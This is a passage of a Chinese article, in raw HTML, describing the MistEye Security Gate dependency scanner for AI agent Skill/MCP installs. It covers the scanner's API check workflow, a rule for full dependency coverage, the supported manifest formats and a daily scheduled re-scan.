wxw-img" data-ratio="0.43899657924743446" data-type="png" data-w="877" height="185" style="margin-left: 0px;margin-top: 0px;" width="421" data-imgfileid="100021240" src="https://wechat2rss.xlab.app/img-proxy/?k=5e7211af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKOiayyUC9icYM9kMspfliaW4VEAoicGmoFf9tqoB95QHbkjyicYrIAwSDt4oibSjxGro6ianEN09GKOafV82sC9C6NkaOKnx9ztvXLt4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></p><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 4pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 17pt;font-family: Arial, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">三、工作机制：从依赖声明到安全结论的完整闭环</span></span></b></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye Security Gate 的工作流程可以概括为四个步骤：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">解析依赖声明 → 生成检测任务 → 调用 MistEye API → 输出阻断/放行结论</span></span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.1 全量依赖扫描与覆盖率门限</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">与常见的&#34;只检查包管理器域名是否可信&#34;的粗放做法不同，MistEye 要求对依赖声明文件中解析出的</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">每一个</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依赖项执行独立的供应链包直查。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">范例流程：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 当 AI 代理检测到 requirements.txt 中包含 requests==2.32.3 时，MistEye 会构造如下 API 请求：</span></span></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="perl"><code><span leaf="">{  </span></code><br/><code><span leaf=""> <span class="code-snippet__string">&#34;target&#34;</span>: <span class="code-snippet__string">&#34;requests</span><span class="code-snippet__string"><span class="code-snippet__variable">@2</span></span><span class="code-snippet__string">.32.3&#34;</span>,  </span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;type&#34;</span>: <span class="code-snippet__string">&#34;package:pypi&#34;</span> </span></code><br/><code><span leaf="">  }</span></code><br/></pre></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">调用 MistEye API 后，根据返回的 safe 字段和 matches 数组决定是否放行。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为保证检测不遗漏，系统强制要求 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依赖包检测次数 &gt;= 依赖项数量</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（即 dependency_package_detect_count &gt;= dependency_item_count）。这一覆盖率门限从机制上防止了&#34;只检查注册表域名而跳过具体包检测&#34;的取巧行为。</span></span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.2 支持的依赖声明格式</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 覆盖主流编程语言的包管理格式：</span></span></b></p><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">语言/生态</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依赖文件</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Python</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">requirements*.txt、pyproject.toml、Pipfile</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">JavaScript/TypeScript</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">package.json、package-lock.json</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Go</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">go.mod</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Rust</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Cargo.toml</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Java</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">pom.xml、build.gradle</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Ruby</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Gemfile</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">PHP</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">composer.json</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">.NET</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">*.csproj</span></span></p></td></tr></tbody></table><h2 dir="ltr" style="line-height: 1.38;margin-top: 24px;margin-bottom: 4pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 17pt;font-family: Arial, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">四、每日巡检：从一次性检测到持续性运营</span></span></b></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全不是一个时间点的动作，而是持续的过程。前面的前置检测解决的是&#34;安装那一刻是否安全&#34;，但威胁情报是动态的——一个包可能在安装时未被标记为恶意，后续 MistEye 威胁情报库更新，该包才被确认为供应链投毒载体。如果没有持续检测，这个&#34;先过关后变恶意&#34;的依赖就会成为潜伏的盲区。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">每日巡检正是为此设计：对已安装的 Skill/MCP 依赖</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">反复检测</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">，及时发现此前未被标记、后经情报更新的恶意项。MistEye Security Gate 支持通过 </span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">OpenClaw</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"> 和 </span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">Hermes</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"> 两个任务调度器设置每日自动化巡检（默认凌晨 3:00 Asia/Shanghai），实现技能依赖的全生命周期安全检查。</span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4.1 巡检步骤</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">每日巡检遵循固定的执行顺序：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">网络连通性预检</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：确认可正常访问 MistEye API</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">凭据预检</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：检查 MISTEYE_API_KEY 是否可用</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">版本更新检查</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：对比本地 SKILL.md 版本与上游仓库最新版本</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 